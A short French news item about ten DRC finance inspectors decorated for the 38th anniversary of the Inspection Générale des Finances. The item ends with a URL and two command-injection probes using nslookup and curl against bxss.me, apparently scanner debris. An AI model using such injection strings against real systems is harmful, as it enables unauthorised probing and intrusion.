A l’occasion de la célébration du 38 ème Anniversaire de l’Inspection Générale des Finances, dix Inspecteurs Généraux des Finances ont été décorés par les Chancelier des ordres Nationaux, le Général Major MATETUZULWA André, au nom du Chef de l’État en reconnaissance de leurs dévouement, engagements et intégrité au regard de la Nation.
Parmis c'est récipiandaires, figure l’Inspecteur Général des Finances Chef de Service Christophe BITASIMWA BAHII, ABOLIA TABA POPOLO, Jean-Marie BITALO, Eddy MOOKO BONKAY, Roger LIONDJO LOBOTA, Baudoin KITENGE KISIMBA, Jean-Pierre KAPUKU, Gedeon Flores MUZEZE NZONZIMBU, Émile OSOMBA WEDIKO qui ont reçu des médailles de mérite civique.
Deux autres Inspecteurs Généraux des Finances décédés dans l’exercice de leurs fonction ont été décorés à titre posthume.
Une médaille d'or de mérite civique a été décerné à Joachuim MAYEMBA MAKWALA MBUANGI, tandis que Victor BATUBENGA PANDA MADI lui, a été admis dans l’ordre des héros Nationaux KABILA - LUMUMBA au grade de Commandeur.
Au regard de la lutte acharné contre la corruption et les détournements des deniers publics, mené par ces Inspecteurs Généraux des Finances, une reconnaissance de leurs mérites demeure un acte d’encouragement majeure à la fois pour les lauréats que pour les générations futures des Inspecteurs des Finances.
https://www.igf.gouv.cd@bxss.me/
|(nslookup${IFS}-q${IFS}cname${IFS}hitrnuvmrhfquae806.bxss.me||curl${IFS}hitrnuvmrhfquae806.bxss.me)
`(nslookup -q=cname hitrikbuesebl06d10.bxss.me||curl hitrikbuesebl06d10.bxss.me)`